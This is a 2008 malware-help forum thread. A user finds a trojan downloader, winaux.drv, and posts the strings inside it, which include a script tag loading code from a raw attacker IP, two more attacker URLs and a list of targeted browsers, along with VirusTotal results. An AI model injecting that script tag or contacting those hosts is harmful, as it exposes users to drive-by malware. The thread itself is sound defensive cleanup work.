O9 - Extra 'Tools' menuitem: Create Mobile Favorite... - {2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - C:\Program Files\Microsoft ActiveSync\INETREPL.DLL
O9 - Extra button: Run WinHTTrack - {36ECAF82-3300-8F84-092E-AFF36D6C7040} - C:\Program Files\WinHTTrack\WinHTTrackIEBar.dll
O9 - Extra 'Tools' menuitem: Launch WinHTTrack - {36ECAF82-3300-8F84-092E-AFF36D6C7040} - C:\Program Files\WinHTTrack\WinHTTrackIEBar.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: {FD0B6769-6490-4A91-AA0A-B5AE0DC75AC9} (Performance Viewer Activex Control) - https://secure.logmein.com/activex/ractrl.cab?lmi=100
O17 - HKLM\System\CCS\Services\Tcpip\..\{42CDC7C4-F7EB-4E2B-A3B7-4FC4EB06E469}: NameServer = 192.168.254.102
O23 - Service: Lavasoft Ad-Aware Service (aawservice) - Lavasoft - C:\Program Files\Lavasoft\Ad-Aware\aawservice.exe
O23 - Service: Apple Mobile Device - Apple, Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
O23 - Service: Bonjour Service - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: DynDNS Updater Service (DynDNS_Updater_Service) - Kana Solution - C:\Program Files\DynDNS Updater\DynDNS.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: iPod Service - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\System32\nvsvc32.exe
O23 - Service: z2 Remote2PC Server (z2 R2PC Server) - z2 Software - C:\Program Files\z2 Remote2PC\R2PCServ.exe

--
End of file - 4890 bytes

#6 teacup61

teacup61

    Bleepin' Texan!


  • Malware Response Team
  • 17,075 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:Wills Point, Texas
  • Local time:11:56 AM

Posted 18 August 2008 - 03:01 PM

Hello,

So the problem is persisting?

Download the HostsXpert Here
http://www.funkytoad.com/download/HostsXpert.zip

Unzip HostsXpert to your desktop

Open up the HostsXpert program.

* Make sure that the "make hosts writable?" button in the upper left corner is enabled.
* Click back up Host files
* then click "Restore MS Hosts File"
* close program

Also.....do you run a router? Please let me know. :thumbsup:

Thanks,
tea
Please make a donation so I can keep helping people just like you.
Every little bit helps! :)
You can even use your credit card! Thank you!

Posted Image


Error reading poptart in Drive A: Delete kids y/n?

#7 gltech

gltech
  • Topic Starter

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Local time:12:56 PM

Posted 18 August 2008 - 03:04 PM

News flash:

I used ProcessMonitor to look at the dlls IE was using (it displays other files in addtion to dlls). I searched the web for each one (about 50 or so, whew!). I found one called "winaux.drv". When I searched the web for that one, I got no results. So I opened it up in a harmless editor, and voila', it contains the 76.163.191.132 address. I removed the file from C:\Windows\System32 and my problem is gone.

While I had "winaux.drv" open in the editor, I noticed some interesting text strings:

<script src=//76.163.191.132/cp/></script>
http://76.163.190.49/cp/?u=5
http://76.163.124.43/cp/?v=5
iexplore
avant
browser
netcaptor
msn6
maxthon opera
firefox myie
inetadviser enigma
networker
theworld
netscape
mozilla surf
yahoo
msn live
icq google
yandex
rambler search
\winaux.drv
\tmp001.exe
\svgainit.drv

I looked in my System32 folder for those last two file names. "svgainit.drv" was there. I searched the web for that -- no results, so I assume it's a bogus file too. I removed it as well and it didn't seem to affect anything. I did not find "tmp001.exe" on my system, but a web search identified it AS MALWARE.

I'm gonna' see how she runs for a couple of days.

Since the web search didn't turn up anything for "winaux.drv" or "svgainit.drv", is this some new unknown scumware? Should I report it somewhere?

I have traced the 76.163.191.132 to:

OrgName: Ecommerce Corporation
OrgID: ECOMM-5
Address: 247 Mitch Lane
City: Hopkinsville
StateProv: KY
PostalCode: 42240
Country: US

Should I call them? I assume they are an internet provider or hosting service and one of their customers is the culprit. Boy would I love to catch one of these scumbags. They would have a REALLY bad day.

gltech

#8 teacup61

teacup61

    Bleepin' Texan!


  • Malware Response Team
  • 17,075 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:Wills Point, Texas
  • Local time:11:56 AM

Posted 18 August 2008 - 03:11 PM

I think we're cross posting, but you can do this with those files to be sure :

Please navigate to the following file(s):

svgainit.drv
winaux.drv


Please go to VirusTotal and submit the file for a scan and post the results in your next reply.
Please make a donation so I can keep helping people just like you.
Every little bit helps! :)
You can even use your credit card! Thank you!

Posted Image


Error reading poptart in Drive A: Delete kids y/n?

#9 gltech

gltech
  • Topic Starter

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Local time:12:56 PM

Posted 18 August 2008 - 03:28 PM

Here's the virustotal results for "winaux.drv" (looks like somebody already submitted it on 8/3):

**************************
File has already been analysed:
MD5: a166b3484ffd23371ad02ba0a8a0c3b5
First received: 08.03.2008 23:12:50 (CET)
Date: 08.03.2008 23:12:50 (CET) [>14D]
Results: 6/36
Permalink: analisis/48d34546929ec02ca7e03689eb6ad40e


File 4b9a22ae002534353882000136dc69005 received on 08.03.2008 23:12:50 (CET)
Current status: finished

Result: 6/36 (16.67%)
Compact Print results
Antivirus Version Last Update Result
AhnLab-V3 - - -
AntiVir - - TR/Dldr.Delphi.Gen
Authentium - - -
Avast - - -
AVG - - -
BitDefender - - -
CAT-QuickHeal - - -
ClamAV - - -
DrWeb - - DLOADER.Trojan
eSafe - - -
eTrust-Vet - - -
Ewido - - -
F-Prot - - -
F-Secure - - -
Fortinet - - -
GData - - -
Ikarus - - Trojan.Win32.Delf.nf
K7AntiVirus - - -
Kaspersky - - -
McAfee - - -
Microsoft - - -
NOD32v2 - - -
Norman - - -
Panda - - Suspicious file
PCTools - - -
Prevx1 - - -
Rising - - -
Sophos - - Mal/Delf-M
Sunbelt - - -
Symantec - - -
TheHacker - - -
TrendMicro - - -
VBA32 - - -
ViRobot - - -
VirusBuster - - -
Webwasher-Gateway - - Trojan.Dldr.Delphi.Gen
Additional information
MD5: a166b3484ffd23371ad02ba0a8a0c3b5
SHA1: ef2fcf62914cb5b19262100d3f1373f1529315b2
SHA256: 010303068af154979e8b40afcf27e786d3d12d573cefe591a0bc65d903aa822c
SHA512: 1a64569e578901fe718c3ab15f4e18f0dd0455b7fc75d2ab917bee8408879e8299dc6e09aa89cd2a0e7bd8e2fa06b553d1f8df89cf63c0afda6b9398c1a7b8fb
***********************


and for "svgainit.drv" (seemed to be one virustotal hadn't seen):

File svgainit.drv received on 08.18.2008 22:22:58 (CET)
Current status: Loading ... queued waiting scanning finished NOT FOUND STOPPED


***********************
Result: 0/35 (0%)
Loading server information...
Your file is queued in position: ___.
Estimated start time is between ___ and ___ .
Do not close the window until scan is complete.
The scanner that was processing your file is stopped at this moment, we are going to wait a few seconds to try to recover your result.
If you are waiting for more than five minutes you have to resend your file.
Your file is being scanned by VirusTotal in this moment,
results will be shown as they're generated.
Compact Print results
Your file has expired or does not exists.
Service is stopped in this moments, your file is waiting to be scanned (position: ) for an undefined time.

You can wait for web response (automatic reload) or type your email in the form below and click "request" so the system sends you a notification when the scan is finished.
Email:


Antivirus Version Last Update Result
AhnLab-V3 2008.8.19.0 2008.08.18 -
AntiVir 7.8.1.19 2008.08.18 -
Authentium 5.1.0.4 2008.08.18 -
Avast 4.8.1195.0 2008.08.18 -
AVG 8.0.0.161 2008.08.18 -
BitDefender 7.2 2008.08.18 -
CAT-QuickHeal 9.50 2008.08.18 -
ClamAV 0.93.1 2008.08.18 -
DrWeb 4.44.0.09170 2008.08.18 -
eSafe 7.0.17.0 2008.08.18 -
eTrust-Vet 31.6.6035 2008.08.15 -
Ewido 4.0 2008.08.18 -
F-Prot 4.4.4.56 2008.08.18 -
F-Secure 7.60.13501.0 2008.08.18 -
Fortinet 3.14.0.0 2008.08.18 -
GData 2.0.7306.1023 2008.08.18 -
Ikarus T3.1.1.34.0 2008.08.18 -
K7AntiVirus 7.10.420 2008.08.18 -
Kaspersky 7.0.0.125 2008.08.18 -
McAfee 5363 2008.08.18 -
Microsoft 1.3807 2008.08.18 -
NOD32v2 3365 2008.08.18 -
Panda 9.0.0.4 2008.08.18 -
PCTools 4.4.2.0 2008.08.18 -
Prevx1 V2 2008.08.18 -
Rising 20.58.02.00 2008.08.18 -
Sophos 4.32.0 2008.08.18 -
Sunbelt 3.1.1546.1 2008.08.15 -
Symantec 10 2008.08.18 -
TheHacker 6.3.0.5.053 2008.08.18 -
TrendMicro 8.700.0.1004 2008.08.18 -
VBA32 3.12.8.3 2008.08.18 -
ViRobot 2008.8.18.1339 2008.08.18 -
VirusBuster 4.5.11.0 2008.08.18 -
Webwasher-Gateway 6.6.2 2008.08.18 -
Additional information
File size: 60 bytes
MD5...: 3e1761401891f7dfd479c9ba29b67f28
SHA1..: 18671233667defce2ebc83c6324755fa77a62f53
SHA256: 773261c087883d539f780e96811cdc4d74588da3cfcbac5cf79c025887d5975b
SHA512: 5535c73a06b1bec9a2f10f8ee91421825041e1d5ff8757736fa32cc6acf1a51e
a099662ede7cfbccefbe4690eda975870db072e09a30bb2bc8f0f030c680626e
PEiD..: -
PEInfo: -
*********************


#10 teacup61

teacup61

    Bleepin' Texan!


  • Malware Response Team
  • 17,075 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:Wills Point, Texas
  • Local time:11:56 AM

Posted 18 August 2008 - 04:16 PM

Hi,

Good....did you delete the first one then? On the second it said :

NOT FOUND STOPPED

and

Your file has expired or does not exists.

And didn't report it as bad in any case.

tea
Please make a donation so I can keep helping people just like you.
Every little bit helps! :)
You can even use your credit card! Thank you!

Posted Image


Error reading poptart in Drive A: Delete kids y/n?

#11 teacup61

teacup61

    Bleepin' Texan!


  • Malware Response Team
  • 17,075 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:Wills Point, Texas
  • Local time:11:56 AM

Posted 11 September 2008 - 05:22 PM

Since this issue appears resolved ... this Topic is closed.

If you need this topic reopened, please request this by sending the moderating team a PM with the address of the thread. This applies only to the original topic starter.

Everyone else please begin a New Topic.
Please make a donation so I can keep helping people just like you.
Every little bit helps! :)
You can even use your credit card! Thank you!

Posted Image


Error reading poptart in Drive A: Delete kids y/n?




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users